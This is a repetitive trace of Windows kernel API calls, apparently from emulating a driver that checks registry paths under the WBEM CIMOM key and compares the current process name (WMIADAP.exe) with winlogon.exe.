| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
